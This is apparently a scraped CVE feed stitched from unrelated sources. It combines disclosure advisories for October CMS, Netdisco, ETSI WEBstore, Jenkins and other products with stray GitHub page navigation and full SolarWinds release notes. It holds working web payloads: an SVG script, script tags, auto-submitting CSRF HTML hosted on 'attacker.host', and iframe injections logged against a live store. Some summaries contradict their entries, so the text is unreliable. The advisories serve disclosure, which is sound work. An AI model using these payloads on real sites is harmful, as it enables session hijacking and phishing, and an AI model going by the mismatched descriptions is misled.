An arbitrary file upload vulnerability in October CMS v3.4.4 allows attackers to execute arbitrary code via a crafted file.

**#Exploit Title:** October CMS v3.4.4 – Stored Cross-Site Scripting (XSS) (Authenticated)

**#Date:** 29 June 2023

**#Exploit Author:** Okan Kurtulus

**#Vendor Homepage:** https://octobercms.com

**#Version:** v3.4.4

**#Tested on:** Ubuntu 22.04

**#CVE:** 2023-37692

**#Proof of Concept:**

**1-)** Install the system through the website and log in with any user with file upload authority.

**2-)** Click on the Media menu at the top.

**3-)** Create an SVG file using the payload below.

    <?xml version="1.0" standalone="no"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
    
    <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
      <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
      <script type="text/javascript">
        alert(1);
      </script>
    </svg>

**4-)** The XSS payload will be triggered when you call the corresponding SVG file.

**NOTE:** This security vulnerability may continue in other versions. It is recommended to disable the SVG extension for this.

CVE-2023-37692: October CMS v3.4.4 – Stored Cross-Site Scripting (XSS) (Authenticated)

Netdisco before v2.063000 was discovered to contain an open redirect vulnerability. An attacker may exploit this vulnerability to redirect users to arbitrary web URLs by tricking the victim users to click on crafted links.

**Netdisco-CVE-2023-37624****Description**

Netdisco before version 2.063000 was found to contain an open redirect vulnerability due to insufficient validation of an input parameter. An attacker may exploit this vulnerability to redirect users to arbitrary web URLs by tricking them into clicking on a specially crafted link.

**Technical Details**

If a user attempts to access a page within Netdisco without a valid session, they are redirected to the login page. Once logged in, the user will be redirected to the page they originally attempted to visit. Insufficient validation of the original url allows a malicious actor to specify an arbitrary URL in the original GET request to the login page.

To reproduce the vulnerability the following URL may be provided:

    http://netdiscoexample.host///www.google.com
    

This will redirect the user to Google after the login process is complete.

**Netdisco-CVE-2023-37623****Description**

Netdisco before version 2.063000 was found to contain multiple stored cross-site scripting (XSS) vulnerabilities. An attacker may exploit this to perform unauthorised actions on behalf of a user.

**Technical Details**

A stored Cross-Site Scripting vulnerability was discovered in the main search box of the web applicaiton. This vulnerability is the result of insufficient sanitisation of the System Name device field. When a search for a device is performed by typing in an IP address, once at least three characters are entered in the search bar matching device System Names are presented in a drop down list by the typeahead feature. If the System Name contains HTML tags, the browser will interpret the contents as valid HTML.

To reproduce the vulnerability, perform the following steps:

1.  Log in to Netdisco as an administrator.
2.  Go to the admin dropdown menu and select Pseudo Devices.
3.  Enter any IPV4 address as the Device IP (eg. 192.168.0.1), then enter the Device Name below, and click the Add button.

    <script>alert(1)</script>
    

4.  Then in the main search box containing the text "Find Anything", enter the first three numbers of the Device IP (i.e. 192).
5.  Observe that the alert box has executed.

Note: There are other ways to inject a payload into the System Name without creating a pseudo device and requiring an admin login.

For example an attacker may set up SNMP on their machine and inserts a Java Script payload as the Device Name, as in the configuration file below:

To inject the payload into Netdisco it is possible to submit a discovery request for the attacker controlled IP. This can be done by enticing an administrator with a valid session can be enticed into clicking on a link that utilises the Open Redirect vulnerability from CVE 2023-37624, for example; 'https://netdiscoexample.host///attacker.host/csrf.html', where netdiscoexample.host is the Netdisco URL and attacker.host/csrf.html hosts the following HTML:

<body onload\="document.form.submit()"\>
   <form action\="https://netdiscoexample.host/admin/discover?device=attackerIP" method\="POST" name\="form" style\="display;none;"\>
</form\>
</body\>

If the administrator clicks on this link then attacker's machine will be discovered and the payload loaded through SNMP and executed when the IP is entered in the search bar, as in the screenshot below.

An additional stored Cross-Site Scripting vulnerability was found in the Job Queue page. This vulnerability is the result of insufficient sanitisation of the Param job field.

To reproduce the vulnerability, perform the following steps:

1.  Log into Netdisco as an administrator.
2.  Go to the Inventory page and open any device. If a device is not present, then add a Pseudo Device as above.
3.  Click in the contact field and enter the following text:

    <script>alert(1)</script>
    

4.  Go to the Admin dropdown menu and select Job Queue.
5.  Esnure the job has a Status of "Done", then hover the mouse point over the Param field containing the text "<script>alert(1)</script>".
6.  Observe that the alert box has executed.

CVE-2023-37624: GitHub - benjaminpsinclair/Netdisco-2023-Advisory

An XSS issue was discovered in FSMLabs TimeKeeper 8.0.17. On the "Configuration -> Compliance -> Add a new compliance report" and "Configuration -> Timekeeper Configuration -> Add a new source there" screens, there are entry points to inject JavaScript code.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-31466: Disclosure/CVE PoC/CVE-2023-31466.md at main · CapgeminiCisRedTeam/Disclosure

A cross-site scripting (XSS) vulnerability in Truedesk v1.2.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the team name parameter.

CVE-2022-31456

A missing origin validation in Slate sandbox could be exploited by a malicious user to modify the page's content, which could lead to phishing attacks.

CVE-2023-30949: Palantir | Trust and Security Portal

Jenkins applies formatting to the console output of builds, transforming plain URLs into hyperlinks. Jenkins 2.415 and earlier, LTS 2.401.2 and earlier does not sanitize or properly encode URLs of these hyperlinks in build logs. This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control build log contents. Jenkins 2.416, LTS 2.401.3 encodes URLs of affected hyperlink annotations in build logs.


**Jenkins Stored Cross-site Scripting vulnerability**

High severity GitHub Reviewed Published Jul 26, 2023 to the GitHub Advisory Database • Updated Jul 26, 2023

GHSA-69vw-3pcm-84rw: Jenkins Stored Cross-site Scripting vulnerability 

ETSI WEBstore 2023 suffers from a persistent cross site scripting vulnerability.

    Document Title:===============ETSI WEBstore 2023 - Persistent Cross Site VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2327Release Date:=============2023-07-26Vulnerability Laboratory ID (VL-ID):====================================2327Common Vulnerability Scoring System:====================================4.6Vulnerability Class:====================Cross Site Scripting - PersistentCurrent Estimated Price:========================1.000€ - 2.000€Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a persistent web vulnerability in the ETSI WebStore web-application.Affected Product(s):====================European Telecommunications Standards Institute (ETSI)Product: WEBstore 2023 - User Management (Web-Application)Vulnerability Disclosure Timeline:==================================2023-07-26: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============MediumAuthentication Type:====================Restricted Authentication (User Privileges)User Interaction:=================Low User InteractionDisclosure Type:================Independent Security ResearchTechnical Details & Description:================================A persistent input validation web vulnerability has been discovered in the official ETSI Webstore 2023 web-application.The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromisebrowser to web-application requests from the application-side.The vulnerability is located in the all input fields of the NewOrModifyCustomer.asp registration / modify formular.Remote attackers are able to inject own malicious script code with persistent attack vector by an inject in thewrong sanitized input fields. The injection point is the registration or modify formular of the webstore.The execution points are located in the index, listarticle, myprofiles and user backend listing of the webstoreweb-appliation service.Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistentexternal redirects to malicious source and persistent manipulation of affected application modules.Request Methode:[+] POSTVulnerable Inputs:[+] first name[+] last name[+] company name[+] addressAffected Modules:[+] MyProfile[+] ListArticle[+] ShowCustomerProof of Concept (PoC):=======================The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and low user interaction.For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.Manual steps to reproduce the vulnerability ...1. Register an account for the etsi webstore using the registration formular2. Inject script code payloads to the firstname, lastname, companyname and address input fields3. Save the account by submit via post method request4. Confirm the email and logon to the accountNote: After the login the execution takes place in the header were the user data is show as well as in separated websites were adress data is displayed. On preview of the customer in the backend an execution of the malicious payload takes as well place.5. Successful reproduce of the persistent web vulnerability!--- PoC Session Logs (POST) [Inject & Execute] ---https://webstore.etsi.org/ecommerce/ShowHideCustomer.aspHost: webstore.etsi.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 906Origin:https://webstore.etsi.orgConnection: keep-aliveReferer:https://webstore.etsi.org/ecommerce/NewOrModifyCustomer.aspCookie: list=2; _ga_L34WJL1P2Z=GS1.1.1690359581.2.1.1690359631.0.0.0; _ga=GA1.1.1806199158.1690355803; ASPSESSIONIDSWABCBBQ=IHBHHHFAJLDMIDCJINGNGIIKUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1NewOrExisting=NEW&eMail=tammy23@protonmail.com&password=cryptoag2&Company=A"><iframe src=https://shorturl.at/uFGNV  onload=alert('TEA1-2-3-4')></iframe>&ClientCode=&ClientCodeCSA3=,&Fname=B"><iframe src=https://shorturl.at/uFGNV  onload=alert('TEA1-2-3-4')></iframe>&member_orga_id=16173&Lname=C"><iframe src=https://shorturl.at/uFGNV  onload=alert('TEA1-2-3-4')></iframe>&Address1=D"><iframe src=https://shorturl.&PostalCode=51221&Address2=E"><iframe src=https://shorturl.&City=Bremen"><iframe src=https://shorturl.at/uFGNV  onload=alert('TEA1-2-3-4')></iframe>&Address3=F"><iframe src=https://shorturl.&Country=ALALBANIA&Phone=234534654364&Fax=&VATID=&FORM_DISCLAIMER=on&FORM_CAPTCHA=S430Q2&Submit=Submit-POST: HTTP/2.0 302 Foundcache-control: privatecontent-type: text/htmllocation: Listarticle.asp?list=2server: Microsoft-IIS/10.0x-frame-options: SAMEORIGINcontent-length: 143-https://webstore.etsi.org/ecommerce/Listarticle.asp?list=2Host: webstore.etsi.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflate, brReferer:https://webstore.etsi.org/ecommerce/NewOrModifyCustomer.aspConnection: keep-aliveCookie: list=2; _ga_L34WJL1P2Z=GS1.1.1690359581.2.1.1690359631.0.0.0; _ga=GA1.1.1806199158.1690355803; ASPSESSIONIDSWABCBBQ=IHBHHHFAJLDMIDCJINGNGIIKUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1-POST: HTTP/2.0 200 OKcache-control: privatecontent-type: text/htmlcontent-encoding: gzipvary: Accept-Encodingserver: Microsoft-IIS/10.0set-cookie: list=2; path=/ecommercex-frame-options: SAMEORIGIN-https://webstore.etsi.org/ecommerce/ShowHideCustomer.aspHost: webstore.etsi.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 906Origin:https://webstore.etsi.orgConnection: keep-aliveReferer:https://webstore.etsi.org/ecommerce/NewOrModifyCustomer.aspCookie: list=2; _ga_L34WJL1P2Z=GS1.1.1690359581.2.1.1690359631.0.0.0; _ga=GA1.1.1806199158.1690355803; ASPSESSIONIDSWABCBBQ=IHBHHHFAJLDMIDCJINGNGIIKUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1NewOrExisting=NEW&eMail=tammy23@protonmail.com&password=cryptoag3&Company=A"><iframe src=https://shorturl.at/uFGNV  onload=alert('TEA1-2-3-4')></iframe>&ClientCode=&ClientCodeCSA3=,&Fname=B"><iframe src=https://shorturl.at/uFGNV  onload=alert('TEA1-2-3-4')></iframe>&member_orga_id=16173&Lname=C"><iframe src=https://shorturl.at/uFGNV  onload=alert('TEA1-2-3-4')></iframe>&Address1=D"><iframe src=https://shorturl.&PostalCode=51221&Address2=E"><iframe src=https://shorturl.&City=Bremen"><iframe src=https://shorturl.at/uFGNV  onload=alert('TEA1-2-3-4')></iframe>&Address3=F"><iframe src=https://shorturl.&Country=ALALBANIA&Phone=234534654364&Fax=&VATID=&FORM_DISCLAIMER=on&FORM_CAPTCHA=S430Q2&Submit=Submit-POST: HTTP/2.0 302 Foundcache-control: privatecontent-type: text/htmllocation: Listarticle.asp?list=2server: Microsoft-IIS/10.0x-frame-options: SAMEORIGINcontent-length: 143-https://webstore.etsi.org/ecommerce/Listarticle.asp?list=2Host: webstore.etsi.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflate, brReferer:https://webstore.etsi.org/ecommerce/NewOrModifyCustomer.aspConnection: keep-aliveCookie: list=2; _ga_L34WJL1P2Z=GS1.1.1690359581.2.1.1690359631.0.0.0; _ga=GA1.1.1806199158.1690355803; ASPSESSIONIDSWABCBBQ=IHBHHHFAJLDMIDCJINGNGIIKUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1-POST: HTTP/2.0 200 OKcache-control: privatecontent-type: text/htmlcontent-encoding: gzipvary: Accept-Encodingserver: Microsoft-IIS/10.0set-cookie: list=2; path=/ecommercex-frame-options: SAMEORIGINVulnerable Source: Profile Header<div id="bloclogin"><div id="identify"><b> B[MALICIOUS PAYLOAD EXECUTION]"><iframe src="https://shorturl.at/uFGNV"  onload="alert('TEA1-2-3-4')"></iframe>&nbsp;C[MALICIOUS PAYLOAD EXECUTION]"><iframe src="https://shorturl.at/uFGNV"  onload="alert('TEA1-2-3-4')"></iframe></b><br>A[MALICIOUS PAYLOAD EXECUTION]"><iframe src="https://shorturl.at/uFGNV"  onload="alert('TEA1-2-3-4')"></iframe></div><input type="button" onclick="window.location.href = '/ecommerce/ChangeExistingCustomer.asp'" value="My profile" id="inputheaderleft"><input type="button" onclick="logout()" value="Logout" id="inputheaderright"></div>Vulnerable Source: MyProfile<tr><td class="formlabel"><label for="Company">Company name</label></td><td class="forminputleft"><input tabindex="1" id="Company" class="inputform" name="Company" placeholder="Company name" value="A[MALICIOUS PAYLOAD EXECUTION]"><iframe src="https://shorturl.at/uFGNV"  onload="alert('TEA1-2-3-4')"></iframe>"/></td><td class="formlabel">Client Code       </td><td><input type="hidden" name="ClientCode" value=""><input type="hidden" name="ClientCodeCSA3" value=""><input type="hidden" name="ClientCodeCSA3" value="">                    </td></tr><tr><td colspan="2">                         </td>        <td class="formlabel"><label for="Fname">First name <font color="red">*</font></label></td><td class="forminputright"><input id="Fname" tabindex="3" class="inputform" name="Fname" placeholder="First name" value="B[MALICIOUS PAYLOAD EXECUTION]"><iframe src="https://shorturl.at/uFGNV"  onload="alert('TEA1-2-3-4')"></iframe>"></td></tr><tr><td class="formlabellong">...  </td><td class="formlabel"><label for="Lname">Last name <font color="red">*</font></label></td><td><input id="Lname" tabindex="6" class="inputform" placeholder="Last name" name="Lname" value="C[MALICIOUS PAYLOAD EXECUTION]"><iframe src="https://shorturl.at/uFGNV"  onload="alert('TEA1-2-3-4')"></iframe>"></td></tr>References:https://webstore.etsi.org/ecommerce/https://webstore.etsi.org/ecommerce/Listarticle.asphttps://webstore.etsi.org/ecommerce/ShowHideCustomer.asphttps://webstore.etsi.org/ecommerce/NewOrModifyCustomer.aspSecurity Risk:==============The security risk of the persistent vulnerability in the webstore web-application of etsi is estimated as medium.Credits & Authors:==================L. Guenther -https://www.vulnerability-lab.com/show.php?user=L.+GuentherDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

ETSI WEBstore 2023 Cross Site Scripting

The SolarWinds Platform was susceptible to the Incorrect Comparison Vulnerability. This vulnerability allows users with administrative access to SolarWinds Web Console to execute arbitrary commands with SYSTEM privileges.

Release date: July 25, 2023

Here's what's new in SolarWinds Platform 2023.3.

**Learn more**

*   Get information about the latest hotfixes.
*   See SolarWinds Platform 2023.3 System Requirements. For information about working with the SolarWinds Platform, see the SolarWinds Platform Administrator Guide.

**New features and improvements in SolarWinds Platform**

*   Support for OpenSSL 3.0
    
*   IIS Centralized Certificate Store can be used for the website in the Configuration Wizard.
    
*   Advanced Option in the Configuration Wizard can be used to change the database connection string only, without the need to perform all other tasks typically executed by the Configuration Wizard.
    
*   AlertStack updates: AlertStack cluster lifetime introduced to automatically close alert stacks after 7 days.
    
*   WorldWide map updates: modifiable WorldWide Map API key support.
    
*   SolarWinds Platform Maps updates: support for displaying the SolarWinds Platform Map on group details view dynamically, based on the group name variable.
    

Return to top

**Fixes**

 

Case number

Description

1293506

The issue where missing free poller licenses caused the Syslog and Traps services to shutdown automatically was addressed.

1202531, 1247388, 1281162, 1305768

Issues with the database upgrade in the Configuration Wizard were addressed.

1271994, 1275876, 1286508, 1294838, 1299411, 1300047, 1304414, 1306968, 1315810, 1316267, 1319417, 1327780, 1328324, 1328441, 1332954, 1337486, 1337686, 1338228, 1348951, 1353130, 1353219, 1353694, 1359474, 1366344, 1367866, 1378873

The issue where unsuccessful login attempts generated by the SolarWinds Platform occurred on the SQL Server was addressed.

1372599

The issue with changing Microsoft EWS API endpoint was addressed.

1360566

The issue with informing users on reaching the license limit was addressed.

1355720

The issue where values for entities monitored by the API poller were not displayed on the SolarWinds Platform widget was addressed.

1315625, 1336784, 1337676, 1358723, 1359224, 1362623, 1372298

The issue where JobEngine was unable to submit a job which resulted in polling issues was addressed.

1353784

The issue where database maintenance failed when removing temporary system files was addressed.

1327342

An issue with muting/unmuting alerts on the Node Management page were addressed.

1351829

The issue where the Centralized Upgrade didn’t prompt users to upgrade scalability engines was addressed.

1306932

Issues with custom properties on SolarWinds Platform deployed in US English but displayed in a browser with different language settings were addressed.

Issues included custom properties for worldwide maps not displayed, inability to edit datetime custom properties, or inability to add or edit custom properties with decimal point values.

1334416, 1350577, 1351585

The issue where alerts using the create ServiceNow incident did not fill in the Assigned To field was addressed.

1333444, 1334126, 1349746, 1358156

The issue where RabbitMQ failed during the upgrade to 2023.2 due to an %%2 error was addressed.

1307772

The issue where groups were hidden if they were added to a map was addressed.

1317479

The issue with default operating system proxy settings not applied was addressed.

1247339, 1269949, 1314666, 1329373, 1351993, 1364314

The issue with JobEngine not starting after the system restart was addressed.

1312232

The issue where the Edit option in the Custom Property Manager was visible for accounts without administrator privileges was addressed.

1197599, 1259651

The issue with upgrading the SolarWinds Platform when the deployment used an Azure SQL database was addressed.

1237057

Performance degradation issues caused by a large number of SSH sessions were addressed.

1287338

Issues with creating nested groups were addressed.

1232188, 1267357

The issue with the "Reference not supported in this version error of SQL Server" messages on Azure SQL was addressed.

1237618

The issue with the Insert Variable button not working when you configure an action that should create a new ServiceNow incident and change the ServiceNow instance was addressed.

824321, 1109050, 1226319, 1293208

The issue with invoking the GetScheduledListResourcesStatus verb initiated from an Additional polling engine was addressed.

1265116

User interface issues on a pop-up for selecting properties when creating a ServiceNow action were addressed.

1286407

Issues with objects on SolarWinds Platform Maps that are outside of the visible grid were addressed.

932494

The issue where the edit option for editing a custom property value is blocked because two additional properties are selected automatically was addressed.

766327, 942393

The issue where you could not remove unused custom properties was addressed.

**CVEs**

SolarWinds would like to thank our Security Researchers below for reporting on the issue in a responsible manner and working with our security, product, and engineering teams to fix the vulnerability.

**SolarWinds CVEs**

    

CVE-ID

Vulnerability Title

Description

Severity

Credit

CVE-2023-23844

SolarWinds Platform Incomplete List of Disallowed Inputs Vulnerability

The SolarWinds Platform was found to be susceptible to the Incorrect Comparison Vulnerability. This vulnerability allows users with administrative access to SolarWinds Web Console to execute arbitrary commands with SYSTEM privileges.

6.8 Medium

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

CVE-2023-33225

SolarWinds Platform Deserialization of Untrusted Data Vulnerability

The SolarWinds Platform was found to be susceptible to the Incorrect Comparison Vulnerability. This vulnerability allows users with administrative access to SolarWinds Web Console to execute arbitrary commands with SYSTEM privileges.

6.8 Medium

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

CVE-2023-33224

SolarWinds Platform Incorrect Behavior Order Vulnerability

The SolarWinds Platform was found to be susceptible to the Incorrect Comparison Vulnerability. This vulnerability allows users with administrative access to SolarWinds Web Console to execute arbitrary commands with NETWORK SERVICE privileges.

6.8 Medium

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

CVE-2023-23843

SolarWinds Platform Incorrect Comparison Vulnerability

The SolarWinds Platform was found to be susceptible to the Incorrect Comparison Vulnerability. This vulnerability allows users with administrative access to SolarWinds Web Console to execute arbitrary commands.

6.8 Medium

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

CVE-2023-33229

SolarWinds Platform Incorrect Input Neutralization Vulnerability

The SolarWinds Platform was found to be susceptible to the Incorrect Input Neutralization Vulnerability. This vulnerability allows a remote adversary with a valid SolarWinds Platform account to append URL parameters to inject passive HTML.

3.1 Low

Juampa Rodriguez (@UnD3sc0n0c1d0)

CVE-2023-3622

SolarWinds Platform Access Control Bypass Vulnerability

An Access Control Bypass Vulnerability exists in the SolarWinds Platform that, if exploited, could allow an underprivileged user to read an arbitrary resource.

4.6 Medium

Alex Shepard

**Third-party CVEs**

   

CVE-ID

Vulnerability Title

Description

Severity

CVE-2022-37434

Heap-Based Buffer Over-Read or Buffer Overflow Vulnerability

zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference).

Critical

CVE-2012-6708

Cross-Site Scripting Vulnerability

jQuery before 1.9.0 is vulnerable to Cross-site Scripting (XSS) attacks. The jQuery(strInput) function does not differentiate selectors from HTML in a reliable fashion. In vulnerable versions, jQuery determined whether the input was HTML by looking for the '<' character anywhere in the string, giving attackers more flexibility when attempting to construct a malicious payload. In fixed versions, jQuery only deems the input to be HTML if it explicitly starts with the '<' character, limiting exploitability only to attackers who can control the beginning of a string, which is far less common.

Medium

CVE-2020-11022

DOM Manipulation Vulnerability

In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0

Medium

CVE-2020-11023

DOM Manipulation Vulnerability

In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.

Medium

CVE-2015-9251

Cross-Site Scripting Vulnerability

jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.

Medium

CVE-2019-11358

Unsanitized Input Vulnerability

jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable \_\_proto\_\_ property, it could extend the native Object.prototype.

Medium

CVE-2020-7656

Cross-Site Scripting Vulnerability

jquery prior to 1.9.0 allows Cross-site Scripting attacks via the load method. The load method fails to recognize and remove "<script>" HTML tags that contain a whitespace character, i.e: "</script >", which results in the enclosed script logic to be executed.

High

Return to top

**Installation or upgrade**

For new installations, you can download the installation file from the product page on https://www.solarwinds.com or from the Customer Portal. For more information, see Get the installer.

For upgrades, including options to pre-stage the installation files, go to Settings > My Deployment to initiate the upgrade. The SolarWinds Installer upgrades your entire deployment (all SolarWinds Platform products and any scalability engines).

For more information, see the SolarWinds Platform Product Installation and Upgrade Guide.

You must be on SolarWinds Platform 2020.2.1 or later to upgrade to SolarWinds Platform 2023.3. If you are on SolarWinds Platform 2020.2 or earlier, first upgrade to 2020.2.6 and then upgrade to 2023.3.

Return to top

**Before you upgrade!**

*   Before upgrading from Orion Platform 2020.2.6 and earlier to SolarWinds Platform 2022.3 or later, make sure the database user you use to connect to your SQL Server has the **db create** privilege. **Without this privilege, the upgrade will not complete.**
    
*   The legacy syslog and traps functionality has been retired and replaced with a new functionality called SolarWinds Log Viewer, which can be upgraded to Log Analyzer for additional capabilities. Current rules and history will automatically be migrated to the new logging functionality (SolarWinds Log Viewer or Log Analyzer). The functionality of SolarWinds Log Viewer and Log Analyzer has been improved to more closely match legacy functionality. See LA 2022.3 release notes for details.
    
    If you built syslog and trap alerts using custom SQL queries, they will not function after upgrading to 2022.3 or later. SolarWinds recommends you rewrite the alerts using SWQL (Orion.OLM entities) or using the alerting functionality built into Log Viewer/Log Analyzer.
    
*   Some upgrade situations from the Orion Platform to the SolarWinds Platform are not supported and the installer will stop the upgrade automatically.
    *   If you have a SQL Server older than 2016.
    *   If you have an Orion Platform product version 2020.2 or earlier.

Return to top

**End of life**

For modules based on Orion Platform 2020.2.6 and earlier, SolarWinds has announced end-of-life plans. As always, SolarWinds recommends you upgrade to the latest version of your products at your earliest convenience.

   

Version

EOL Announcements

EOE Effective Dates

EOL Effective Dates

2020.2.6

**April 18, 2023**: End-of-Life (EoL) announcement – Customers on Orion Platform 2020.2.6 should begin transitioning to the latest version of SolarWinds Platform.

**May 18, 2023**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for Orion Platform 2020.2.6 will no longer be actively supported by SolarWinds.

**May 18, 2024**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for Orion Platform 2020.2.6

2020.2.5

**January 18, 2023**: End-of-Life (EoL) announcement – Customers on Orion Platform 2020.2.5 should begin transitioning to the latest version of SolarWinds Platform.

**February 17, 2023**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for Orion Platform 2020.2.5 will no longer be actively supported by SolarWinds.

**February 17, 2024**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for Orion Platform 2020.2.5.

2020.2.4

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on Orion Platform 2020.2.4 should begin transitioning to the latest version of SolarWinds Platform.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for Orion Platform 2020.2.4 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for Orion Platform 2020.2.4.

2020.2.1

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on Orion Platform 2020.2.1 should begin transitioning to the latest version of SolarWinds Platform.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for Orion Platform 2020.2.1 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for Orion Platform 2020.2.1.

2020.2

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on Orion Platform 2020.2 should begin transitioning to the latest version of SolarWinds Platform.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for Orion Platform 2020.2 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for Orion Platform 2020.2.

See the End of Life Policy for information about SolarWinds product life cycle phases. For supported versions and EoL announcements for all SolarWinds products, see Currently supported software versions.

Return to top

**Deprecation notice**

The following platforms and features are still supported in the current release. However, they will be unsupported in a future release. Plan on upgrading deprecated platforms, and avoid using deprecated features.

 

Type

Details

Network Atlas

Network Atlas is deprecated as of Orion Platform 2020.2. It is still available and supported in the current release, but will be removed in a future release. Deprecation is an indication that you should avoid expanded use of this feature and formulate a plan to discontinue using the feature. SolarWinds recommends that you start using SolarWinds Platform Maps in the SolarWinds Platform Web Console to display maps of physical and logical relationships between entities monitored by the SolarWinds Platform products you have installed.

Port 17778

SWIS REST Endpoint on port 17778 is deprecated as of 2023.1 and will be replaced with port 17774 in a future release. SolarWinds recommends that you start migrating SWIS REST Endpoint to port 17774.

Return to top

**Legal notices**

© 2023 SolarWinds Worldwide, LLC. All rights reserved.

This document may not be reproduced by any means nor modified, decompiled, disassembled, published or distributed, in whole or in part, or translated to any electronic medium or other means without the prior written consent of SolarWinds. All right, title, and interest in and to the software, services, and documentation are and shall remain the exclusive property of SolarWinds, its affiliates, and/or its respective licensors.

